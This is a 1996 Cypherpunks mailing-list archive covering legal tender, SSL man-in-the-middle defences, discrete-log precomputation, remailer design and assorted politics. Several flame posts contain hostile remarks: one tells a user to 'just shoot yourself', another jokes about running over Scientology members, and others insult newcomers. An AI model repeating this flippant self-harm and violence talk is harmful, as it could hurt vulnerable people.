



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Knowles <erehwon@c2.net>
Date: Tue, 10 Sep 1996 12:23:28 +0800
To: Cypherpunks@toad.com
Subject: Yahoo!'s Picks of the Week (September 9, 1996)
In-Reply-To: <m0v0GLh-000rjuC@maki.wwa.com>
Message-ID: <Pine.SUN.3.94.960909175938.15247B-100000@infinity.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


Did anyone else catch this one?

> Welcome to this week's selection of Picks, declassified and hot off
> the press thanks to the Freedom of Information Act. Well, okay, not
> really.  But we like to pretend. On the other hand, if you would like
> to peruse what once was private but now is public (in a federal
> government sense of the word), head on over to The National Security
> Archive. An independent, non-governmental research institute and
> library, the NSArchive is where you'll find declassified
> U.S. documents that shed light on anything from the Nixon-Presley
> Meeting (Elvis wanted to be a Federal Agent at Large!)  to the Cuban
> Missile Crisis and a handful of White House e-mail in-between.
>
>	http://www.seas.gwu.edu/nsarchive/
 

William Knowles
erehwon@c2.net


--
William Knowles    <erehwon@c2.net>
PGP mail welcome & prefered / KeyID 1024/2C34BCF9
PGP Fingerprint 55 0C 78 3C C9 C4 44 DE   5A 3C B4 60 9C 00 FB BD
Finger for public key
--
Vote Harry Browne for President -- http://www.HarryBrowne96.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 16:02:44 +0800
To: cypherpunks@toad.com
Subject: All debtes public and private
Message-ID: <ae5a0cfe1c02100471d0@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:36 PM 9/9/96, jbugden@smtplink.alis.ca wrote:
>This may be a hopelessly naive question, but is it possible to refuse
>payment in
>cash? Is it really good for all debts public and private?
>

There is probably a FAQ on this, as it gets asked and debated so often.
>From my reading of too many posts on too many lists about this issue, here
are some misc. points:

* First, anyone may specify what form of payment they want to be paid in,
in advance of a transaction. Alice may demand payment in gold, in platinum,
in barrels of oil, or in Blatislavan Yarts. Bob is free to decline her
terms.

(A common example is a sign saying "No bills over $20 accepted." Thus, if
Bob fills his gas tank and then says "Here's a thousand-dollar bill...I
hope you have change," he cannot escape his debt simply because the gas
station does not make change for $1000 bills. If there is no sign, and the
$1K note is offered....well, I don't know what would happen. Maybe there's
been a case like this... Certainly the debt is not discharged merely
because the payment cannot be accepted at the time....)

* Second, once a debt has been incurred--as when a restaurant meal has been
consumed, a gas tank filled, etc.--and absent any special arrangements for
the payment to be in some special form, the debt is considered discharged
if payment in legal tender (dollars) is offered. That is, the debtor can
offer dollars. If the merchant demands Blatislavan Yarts, the State will
not consider the debtor in default for not paying in Yarts. (Again, absent
a contractual agreement.)

* Third, a merchant is free to not let a transaction go to completion at
the point of sale (e.g., the cash register, for physical goods being
purchased) if the form of payment is not acceptable to him. (The case of a
gas tank already being filled, a restaurant meal already being eaten is
more complicated, with an "implied contract" being involved. Absent signs
or agreements clearly announced, the assumption is that dollars are the
means of settlement.)

* Fourth, the main reason for the "legal tender for all debts public and
private" statement appears to be linked to efforts to stamp out private,
bank-issued currencies.

* Fifth, there are various books on alternative currencies,
denationalization of money, and such issues. Basically, trying to introduce
a new currency is not likely to be strongly supported by the legal system.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Tue, 10 Sep 1996 10:01:12 +0800
To: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Subject: Re: TWA 800 - Serious thread.
In-Reply-To: <Pine.3.89.9609090454.B18246-0100000@skypoint-gw.globelle.com>
Message-ID: <Pine.BSI.3.91.960909182401.4176D-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain


I think the other big, if not worse, question is, why is it that Flight 
800 is still so STEADILY in the news, even now?  They seem to be really 
good at fighting back and forth with themselves with the same outcomes.
I don't like this, one bit.

I haven't seen this much annoying trash on the news since OJ Shrimpson 
was around.

I don't watch the news anymore.  I don't want to know what I am becoming 
a part of (outlawing illegal immigrants from being able to go to school, 
nationwide ID cards, being a number (and this only began in the late 70's),
and so on and so forth -- we are becoming that which we sought to escape 
in the 1400's, and that frightens the hell out of me.)

--Millie.

OBcrypto:  There is a product in beta-testing stage now called Secure 
Mail (and secure web protocol).  I haven't gotten around to testing it 
yet, but have the facts, if anyone wants them -- I'd like to see this 
pseudoencryption go down the toilet.  It makes me ill, though not as ill 
as the original subject of this post... :)

Have a nice day.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Tue, 10 Sep 1996 13:28:23 +0800
To: nexus@adv.es (I~nigo Gonzalez)
Subject: Re: BoS: Can you trust your ISP ??
In-Reply-To: <3234A158.3492@adv.es>
Message-ID: <199609100149.SAA16682@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


I~nigo Gonzalez writes:
> 
> Hello, 
>    I'm thinking about how can I get rid off this kind of attack *before* it 
> happens. Can you please send me your comments about this? I don't know so 
> much about the how SSL works, but I think this is something that can 
> happen...

[classic Man-in-the-Middle attack]


What you described is the Man In The Middle attack, often
abbreviated on these lists as MITM.  The fact that there's
an abbreviation for it should indicate to you how often
it is discussed.  However it's also one of the first
problems (besides the basic encryption) that protocol
designers think of.

It's been taken care of in SSL3- the server's certificate
must be signed by a CA that the client trusts.  Unless
the digital signature can be spoofed, and it probably
can't be, the client can be certain that the server certificate it got
is really from the server that it claims to be from.

Assuming that RSA still can't be broken, the client can be sure
that the pre-master-key material that it sends to the server
(and which is the basis for the symmetric crypto session keys)
will not be compromised.


If you grab a copy of the SSL3 spec (from netscape's web site)
and read the appendicies there's more good stuff about possible
attacks and what's been done to counter them.




-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
Principal, LNE Consulting: SSL, crypto applications, Internet security.
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Tue, 10 Sep 1996 13:12:04 +0800
To: cypherpunks@toad.com
Subject: Re: ... subversive leftists
Message-ID: <199609100157.SAA12409@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

>As to the "Reichskommander," in our country, and on the Net, such jokes are
>not illegal. I rather suspect they are in Germany, either the DDR or the
>Western side.
>
>As to "tasteless and insulting," a matter of personal perspective. I find
>it helpful to call a spade a spade, and others apparently do as well.

Ja, Ja. Das ist gut. Ve make chust a little choke now.

VERE ARE YOUR PAPERSS!?

___
David M. Rose

"Theft is...a heinous crime, property representing as it does
a goodly proportion of a man's life-effort: ergo, his vital force.
Property is life; ...do not steal".
                                                    --J.H. Vance





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 13:33:59 +0800
To: cypherpunks@toad.com
Subject: Terrorists
Message-ID: <ae5a173f1d021004da7a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:29 PM 9/9/96, Duncan Frissell wrote:
>At 01:49 AM 9/9/96 -0700, Timothy C. May wrote:

>>And the net effect of crypto anarchy is to destabilize and marginalize
>>central governments, which is a net positive effect. If some eggs get
>>broken in the process, the biological imperative will generate more eggs.
>>No big deal.
>
>Particularly since governments murdered 160 million in the last 100 years
>while we civilians have only managed to murder a paltry 20 million or fewer.
>A savings of 160 million deaths leaves a lot of room for a non-harmful
>increase in private murder.  We could increase the private murder rate by 8
>to 10 times and still break even.
>
>Note too that most terrorism is aimed at governments (even if practiced on
>civilians).  In the absence of government, terrorist incentives may be reduced.

Remember, folks, it is _governments_ which interfere with natural movements
of people, capital, but not birds.

I don't want to jeopardize my reputation as a List.Racist, but I think one
of the longterm (not in the next 15 years) implications of the things we
talk about will be the increased lowering of national borders. (Yes, I have
long talked about national borders being only speed bumps...here I'm
talking about _physical_ borders.)

Some good insights into the "border issue" are in the current movie "Lone
Star." See it to appreciate things from a Mexican's perspective, when Texas
is viewed as being essentially Mexican.  (Some great humor, too. And a good
murder mystery. And a love story. Conspiracy, humor, murder, love...all the
ingredients of a great story. All three major American races collide, and
mix. No role for Asians, though. Another movie...maybe a Wayne Wang movie.)

("Lone Star" is this year's "Pulp Fiction," just as "Usual Suspects" was
last year's "Pulp Fiction.")

Crypto anarchy means the undermining of governments, and hence handouts to
people by government. People will only move physically for physical jobs,
and not for handouts. People will flow to where the jobs are, and jobs will
flow to where the people are. Isn't this what we really want?

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vince <demo@offshore.com.ai>
Date: Tue, 10 Sep 1996 10:41:40 +0800
To: tbyfield@panix.com
Subject: Re: TWA 800 - hit by an unarmed US missile?
In-Reply-To: <199609091638.MAA19400@mail2.panix.com>
Message-ID: <Pine.LNX.3.91.960909185902.1462B-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 9 Sep 1996 tbyfield@panix.com wrote:
> vince@offshore.com.ai (Vincent Cate):
> > If the Navy was firing missiles in this area, it really does seem like the
> > press should be checking out this angle. 
> 
>    What makes you think they aren't?

Not saying they aren't; however, I don't recall seeing CNN or any of the
networks saying if the Navy really was firing missiles or not.  Have they?
Never seen anyone ask questions about US firing missiles (have seen them
ask if it was a missile or a bomb). I don't get any US newspapers here in
Anguilla, so my impression of the US press is really just from TV. 

Is the press on top of this?

    --  Vince





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@c2.net (Matthew Ghio)
Date: Tue, 10 Sep 1996 13:35:37 +0800
To: remailer-operators@c2.org
Subject: Re: forward secrecy in mixmaster
In-Reply-To: <v03007808ae59495b4215@[206.170.115.3]>
Message-ID: <199609100232.TAA22069@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Lance Cottrell <loki@infonex.com> wrote:

> Our options will open up alot when the patent expires next year.

> I agree it does not make much difference mathematically, but one DH modulus
> always makes me uneasy. DH is still patented though. I think I will continue
> to use RSAREF, but compose the standard so the protocol supports unlimited
> key sizes.

RSAREF does not give you a license to use DH because RSA does not have a
licence to use DH.  So basically you can use whatever library you want and
it doesn't change your position legally.  I believe I read that in the
Schafly-RSA-Cylink lawsuit, the judge issued an injunction barring Cylink
from suing anyone else for patent infringement until the current case is
resolved.  The judge will probably throw out the patent - Anyone know when
the next hearing in this case is?

Mathematically, a common modulus does make a difference, because you can
do precomputations on the modulus.  This generally involves finding the
discrete logarithms of many small primes modulo p.  For example, if you
solved (by exhaustive search) the values of a,b,c,d,e... such that, mod p,
g^a=2, g^b=3, g^c=5, g^d=7, g^e=11, and so on, then you could compute the
discrete logs of larger numbers by factoring them into small primes.  For
example, if you wanted to take the discrete log of, oh, say, 339570, that
would be a+2b+c+3d+e, since 339570=2*(3^2)*5*(7^3)*11.  The logarithm of a
product is the sum of the logarithms of the factors.  What happens if you
want to take the discrete log of a number you can't factor?  Let's suppose
you want the discrete log of 257.  Well, you can't factor that because
it's prime.  But, since we're working modulo p, 257=p+257.  So you can
try factoring p+257, or 2p+257, or 3p+257, etc. until you find a number
that factors nicely into some combination of the primes that you do have.
Of course, the more small primes you collect, the easier it is to find
such numbers, thus the more small primes you collect, the easier it is to
find more small primes. :)

In light of the above, it should be apparent that users should not share
a common modulus, even if they use different generators (you can take the
discrete log of one generator to the other, once you crack one of them).
Thus it is wise for each user to create their own prime number modulus
before they generate their key.

Oh, one final thing - (actually two final things) - If the modulus is not
prime, and the attacker can factor the modulus, then the discrete log
problem becomes somewhat easier because of the Chinese Remainder Theorem.
Also, the ability to do arbitrary discrete logs modulo p, where p is a
product and not prime, implies the ability to factor p.  (Think about it
for awhile. ;-)  Overall tho, the discrete log problem is believed to be
slightly harder than factoring.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 14:19:02 +0800
To: Cypherpunks@toad.com
Subject: Re: Yahoo!'s Picks of the Week (September 9, 1996)
Message-ID: <ae5a22b51e0210048be6@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:08 AM 9/10/96, William Knowles wrote:
>Did anyone else catch this one?
>
>> Welcome to this week's selection of Picks, declassified and hot off
>> the press thanks to the Freedom of Information Act. Well, okay, not
>> really.  But we like to pretend. On the other hand, if you would like
>> to peruse what once was private but now is public (in a federal
>> government sense of the word), head on over to The National Security
>> Archive. An independent, non-governmental research institute and
>> library, the NSArchive is where you'll find declassified
>> U.S. documents that shed light on anything from the Nixon-Presley
>> Meeting (Elvis wanted to be a Federal Agent at Large!)  to the Cuban
>> Missile Crisis and a handful of White House e-mail in-between.
>>
>>       http://www.seas.gwu.edu/nsarchive/

The National Security Archive has been around for many years, and has no
connection (insofar as I know or suspect) with the NSA. They have regularly
supplied talking heads to various talk shows, especially six years ago
during the Gulf War.

(In fact, they have a leftist bias.)

--Tim


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Greg Kucharo" <sophi@best.com>
Date: Tue, 10 Sep 1996 13:41:57 +0800
To: <cypherpunks@toad.com>
Subject: Re: Conservation Laws, Money, Engines, and Ontology
Message-ID: <199609100236.TAA25621@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


>The most basic principle is this: those with resources they control (and
>"own") set the rates and policies.

  I assume you mean this applies to both parties.  The ISP has resources
that I want to purchase.  I have monetary resources it wants in return. 
Here's an idea; a contract socket.  This socket negotiates a info exchange
deal based on a base of variables that you have programmed it with.  The
exchange is made and money changes hands.  Build in the usual things like
reputation checking and what not to verify that the other guy meets the
variables outlined(or at least can be trusted to).
  ???????????????????????????????????????
Greg Kucharo
sophi@best.com
"Eppur si moeve" -Galileo
???????????????????????????????????????





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.com>
Date: Mon, 9 Sep 1996 23:20:57 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Encourage Singapore To Come Out Of the Stone Age
In-Reply-To: <199609081635.JAA05916@dns1.noc.best.net>
Message-ID: <Pine.WNT.3.95.960909111559.-966951E-100000@stanley.ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Sep 1996, James A. Donald wrote:

> At 12:39 PM 9/3/96 +0800, Enzo Michelangeli wrote:
> > The idea that rights and values can be "natural" is contradicted by
> > several thousand years of history, during which absolutism or downright
> > tyranny have been well more common than freedom. 
> 
> The existence of foot binding in China is not evidence that women's 
> feet have no particular natural shape.

Sure, but that was a particular case in the history, not the rule.

> > The success of that misleading view in America, and by extension in most
> > of the western countries, is largely due to the unfortunate influence of
> > [...]
> 
> When one engineers bridge, designed according to one theory of 
> materials physics, stands up, and another engineers bridge, designed
> according to a different theory of material physics, falls
> down, does that not suggest that the first engineer knows 
> what he is talking about, and the second engineer does not?

Absolutely: but here the two theories are market economy vs socialism, not
political freedom vs. lack of it.
 
> > In the real world, freedom is a by-product of a materially prosperous
> > society (which is why capitalism generally produces free societies, but
> > socialism does not).
> 
> First, you have this completely the wrong way around:  Prosperity is
> the product of a free society.  For example when the Dutch revolted
> from Spain, they were at first poorer than spain.
> 
> Secondly there is ample counter evidence:  For example in America
> before the european conquest, some Indian societies were extremely
> free and others, such as the Incas, had institutions very similar to 
> modern totalitarianism, yet their material level was very different 
> to today's, and not very different from each others.
>
> Again the Germanic tribes that conquered England had very high levels
> of liberty, yet were terribly poor, and the Icelanders of Saga period
> Iceland were very free, yet very poor.
               ^^^^^^^^^^^^^^^^^^^^^^^^
Er, methinks that those examples strenghten more my thesis than yours:
if liberty alone could bring prosperity, how would do you explain the
cases of those free-but-poor?
In any case, I would stick to periods for which there are reliable written
documents and provable evidence, or else we'll end up believing that
faith in God may split sea waters, and wars start because of an unfaithful
bride. And I can give you plenty of counter-examples where, instead,
industrialization, modern techniques and, crucially, open markets have
brought prosperity to politically totalitarian countries that,
*subsequently*, have developed more open institutions: Taiwan and Korea,
until recently, were more or less ugly fascist dictatorships. China's
GDP, since they ditched communism in favor of capit... er, "market
socialism", has grown on average about 10% a year: I believe that in 10 or
20 years the consequent increase in education and public awareness will
force some form of political liberalization as well (but don't forget that
their per-capita GDP is still 30 times lower than Hong Kong's and 10 times
tha Taiwan's).

Regarding the Habsburg Netherlands, that was very clearly a case of
rebellion for economic independence (not unlike the Boston Tea Party,
OTOH), and, before that, those provinces witnessed the birth of two
modern financial instruments: the tradeable government securities
tied to the excise and property tax imposed by Charles V in 1542, and, a 
few years later in Antwerp, the negotiable international bill of exchange.

> > Trying to build a free society by screaming loud
> > what the "natural" rights are supposed to be, has no better chances of
> > success than [...]
> 
> Succeeded the last two times it was tried.

It succeeded where and when liberty symbiosed with capitalism, and failed
otherwise.

Enzo





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Tue, 10 Sep 1996 11:59:41 +0800
To: cypherpunks@toad.com
Subject: /\/\/\/\/HELP\/\/\/\/\  !
Message-ID: <TCPSMTP.16.9.9.-12.13.16.2645935021.696940@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> I really need help unsubscribing from the Cypherpunks list! it is
 In> imperative!

 Just shoot yourself and it will all go away. . .


 P.J.
 pjn@nworks.com


... Exercise your right to arm and keep bears!

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Tue, 10 Sep 1996 11:48:23 +0800
To: cypherpunks@toad.com
Subject: Re: <none>
Message-ID: <TCPSMTP.16.9.9.-12.13.22.2645935021.696941@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


-=> Quoting Int:snow@smoke.suba.com to P.j. <=-

 In> On Thu, 5 Sep 1996 pjn@nworks.com wrote:
 
 >  In> what do you know about hackers
 > 
 >  More than you appariently...
 > 

 In> Which isn't necessarily all that much.

 Not for him...


 P.J.
 pjn@nworks.com



... Be wary of strong drink. It can make you shoot at tax collectors and m

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Tue, 10 Sep 1996 11:37:13 +0800
To: cypherpunks@toad.com
Subject: Church of Scientology
Message-ID: <TCPSMTP.16.9.9.-12.13.28.2645935021.696942@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> Scuttlebut is, CoS rolled over on some pesky ultra-right-wingers as a
 In> favor to Morris Dees and various scumbag associates. For this, CoS got
 In> their long-awaited (40-plus years!) federal tax-free status.

 I think, after their part in the closing of anon.penet.fi, some people
 should RUN over some CoS members... :)


 P.J.
 pjn@nworks.com



... "Bother," said Pooh, as he was assimilated by the Borg.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Tue, 10 Sep 1996 11:37:05 +0800
To: cypherpunks@toad.com
Subject: Re: talker
Message-ID: <TCPSMTP.16.9.9.-12.13.34.2645935021.696943@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 The shitless fake hacker doom13 tried to say:
 
 > I am doom13. If there is anyone out there who is a hacker or
 >would like to be one you can talk to me and find out stuff like cracking.
 >Just drop a message at doom13@juno.com.


 In> Hmmmm... Want to bet our other friend at juno.com sent him?  I might
 In> just end up killfiling juno.com...  Obviously a low-IQ area of the net.

 Its not low IQ... Its non-existant...

 It is a free E-Mail group, you dont pay, but you have to look at ads...


 P.J.
 pjn@nworks.com
 


... I would rather be judged by twelve then carried by six.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Tue, 10 Sep 1996 11:31:51 +0800
To: cypherpunks@toad.com
Subject: Re: talker [is illiterate
Message-ID: <TCPSMTP.16.9.9.-12.13.40.2645935021.696944@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> =            You know man I am a profesional so don't reply to me 
 In> =            as a novice or anything. I have been doing this since I 
 In> =            wuz 12. And I'm not young for my age I know alot 
 In> =            about hacking and FYI there's alot you could learn from
 In> =            me so don't think 23 is a young age pal.
 In> =
 In> =            Doom13
 In> =


 Listen you little juno-using twit...

 I have been hacking (Yes, the Electronic B&E type of hacking) sinse 
 before you were a twinkle in the mailmans eye...

 YOU want to learn something?  Sit on your ass, and read... Dont waste
 mailbot space with the crap you write...


 P.J.
 pjn@nworks.com


... Eliminate spare time - buy a modem!

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 11 Sep 1996 06:23:02 +0800
To: Barbara Gamble <bgamble@wo0033wp.wo.blm.gov>
Subject: Re: Test...sorry about this - Reply
In-Reply-To: <s233fb41.062@wo0033wp.wo.blm.gov>
Message-ID: <3234DD65.7B44@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Barbara Gamble wrote:
> I got it too.  And since I am a new subscriber, I thought it might be 
> the normal traffic.  The Welcome msg *did* say the list is high-
> traffic.  Still, I was aghast--300 all at once, another 100 just in
> the last hour. Is that typical? (Please forgive such a question from a 
> newcomer to the list.)
> Z.B. <zachb@netcom.com> 09/06 10:38 am
> I'm just posting this to see if there's something wrong with my mail  
> filter - it dumped a ton of messages from this list over the night, > 
> and I'm trying to figure out why the !@%$# it did that.  Sorry for the 
> interruption.
> Zach Babayco
> zachb@netcom.com  <----- finger for PGP public key
> http://www.geocities.com/SiliconValley/Park/4127

If this is any help, I've been on this forum (and on the WWW total) for 
11 days now, and messages have averaged 4 per hour, 96 per day. But this 
only counts cypherpunks@toad.com. If you get email from several forums 
simultaneously, it might be a lot more.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scrappo.reverb@juno.com (A L)
Date: Tue, 10 Sep 1996 17:28:03 +0800
To: cypherpunks@toad.com
Subject: Re: talker
In-Reply-To: <Pine.3.89.9609091334.A27897-0100000@netcom>
Message-ID: <19960909.203925.7647.0.scrappo.reverb@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


>Very possible.  Try reading the alt.2600 newsgroup for about a week 
>and see 
>lists.  "h3y, w0w, d00dz, th1s cyberpun|< li5t is way |<3\/\/L!"
>(Translation: Hey, wow, dudes, this cyberpunk list is way cool!
>for those of you who are asciially impaired :) 
>
>---
>
>Zach Babayco
>
>zachb@netcom.com  <----- finger for PGP public key
>http://www.geocities.com/SiliconValley/Park/4127
Don't forget |-|eY \/\/0\/\/ d00d$! m i 3LiT3 |\|0\/\/?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 15:07:02 +0800
To: cypherpunks@toad.com
Subject: Re: Satellite Bowel Movement?
Message-ID: <ae5a396e21021004e28b@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:12 AM 9/9/96, Blak Dayz wrote:
>        I was out buying groceries and after they scanned the shit through they
>told me that all the ATMs in the City were out due to connection problems. So i
>go home and start trying to scan for the shits and i cant find them. If anyone
>knows what the hell happened i would appreciate the details. I believe it may
>have been a solar flare that caused the companies to redirect their satellites.
>It would do me alot of help considering i had to pay CASH (i hate paper)
>for the
>stuff and i would like to complain to the fucking JPL and satt. operators about
>them warning the public.

I agree. In times like this, they should be warning the public! The
overload was caused by Zeta Reticulans draining more power from the grid
than had been planned by the Ruling Council.

Clinton dispatched _three_ of his Black Helicopters to Area 51, and they
kicked some alien butt. I think the Morks will be more malleable.

We on the Doom13/D&D/Cypherpunks list are wise to their wayz, and their
warez, and will issue aluminum foil helmets to all those in danger.

Latr, d00d!

--Zarkon







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Tue, 10 Sep 1996 15:52:09 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: FWD: remote help
Message-ID: <19960910044954703.AAA197@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


This has the potential to be very useful.  I do hope, however, that there are
some safeguards against hackers.  Just a "Allow access?" dialog would be a
large deterrent.

==================BEGIN FORWARDED MESSAGE==================
>Date:         Mon, 9 Sep 1996 13:30:10 -0700
>Reply-To:     OS/2 Users Discussion List <OS2USERS@VM1.MCGILL.CA>
>Sender:       OS/2 Users Discussion List <OS2USERS@VM1.MCGILL.CA>
>From:         James Ssemakula <JAMES@UCRAC1.UCR.EDU>
>Subject:      FWD: remote help
>X-To:         os2-l@hearn.nic.surfnet.nl, os2users@vm1.mcgill.ca
>To:           Multiple recipients of list OS2USERS <OS2USERS@VM1.MCGILL.CA>


To: "os2news" <os2news@teamos2.org>
Date: Wed, 04 Sep 96 12:49:35 -0500
Reply-To: "Terry Hamilton" <tch@ibm.net>
Subject: OS2News: Remote Support Tool Featured In Merlin

                    REMOTE SUPPORT TOOL FEATURED IN MERLIN

WEST PALM BEACH, FLORIDA, September 3, 1996 ---  International Software
Solutions has announced that an IBM-only version of their product, Remote
Services Management(TM) (R.S.M.) will be included in OS/2 Warp Version 4
(code-named Merlin).  This innovative tool, called IBM Remote Support for
OS/2, allows IBM service representatives to help users directly over the
phone, much as an on-site Help Desk would.  With the permission of the OS/2
user, a remote IBM service representative can now dial into the user's system,
take control of the keyboard and screen, conduct training, run programs, edit
files and, if necessary, reboot.

IBM Remote Support for OS/2 is a functional subset of R.S.M., which was chosen
by IBM from among several remote control tools. R.S.M. is a full function
product allowing network support and administrative people to take control of
client workstations.  For the general user community, R.S.M. is used for help
desk support, software installation and updating, training, and full access to
an office computer from a remote laptop.  Through an integrated Programming
Script Language, R.S.M. can even be used to build complex LAN and WAN
Management applications. R.S.M. was formerly known as PolyPM/2.

According to Tim Guptill, Senior Vice President of International Software
Solutions, USA, "We at I.S.S. are proud that we have been selected to provide
IBM Remote Support for OS/2 for inclusion in the IBM Assistance Center - OS/2
Warp Version 4.  Now, IBM Technical Support can directly access and control
customer machines to perform Help Desk and diagnostic functions.  This is a
revolutionary step in providing a level of customer support as yet unavailable
in the general software market".

For more information on Remote Services Management, contact I.S.S. at their
toll-free number (888) ISS-2-YOU, GO ISSLP on CompuServe (e-mail 104127,1754),
or on the Web at http://www.iss2you.com.

    -0-                             9/04/96
    /CONTACT: Press: Christopher C. Canning, 888-ISS-2-YOU or 407-820-0802,
ext. 210 or Fax: 407-820-0804 or CompuServe: 104127,1754/

===================END FORWARDED MESSAGE===================


- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Tue, 10 Sep 1996 18:34:49 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: One Time Reply Blocks (was Re: strengthening remailerprotocols)
In-Reply-To: <199609092316.QAA24498@netcom6.netcom.com>
Message-ID: <v03007803ae5aa7118b0c@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:19 PM -0700 9/9/96, Bill Frantz wrote:
>On Sun, 8 Sep 1996, Lance Cottrell wrote:
>
>> Mixmaster prevents replay, so flooding multiple copies of a single message
>> will not work. This is the reason Mixmaster has no reply block feature. I
>> can see two ways in which replies can work safely.
>
>To paraphrase John Von Neumann, any system which uses reply blocks is in a
>state of sin.  By this I mean that if there is a chain pointing at you, a
>sufficiently powerful attacker can walk down that chain and find you.
>
>Given that, I will join the state of sin by proposing a mechanism which
>will allow Alice to receive a reply from Bob, but change her mind at any
>time.  The basic idea is to have a one-time reply block which either Bob or
>Alice can send to.  If Alice thinks that too much time has elapsed, and
>powerful enemies are walking down her reply block chain, she can send
>herself a reply and break the chain.  (She might send a reply thru each
>link in the chain to break all the links.)

The reason the message is not resendable is that the remailers keeps track
of the serial number of that header. If forced, the log of serial numbers
could be deleted, and the operator would process the message.

Unless you are assuming some key archived by each remailer for the reply
block, then I think it will be possible to repair the chain.

	-Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
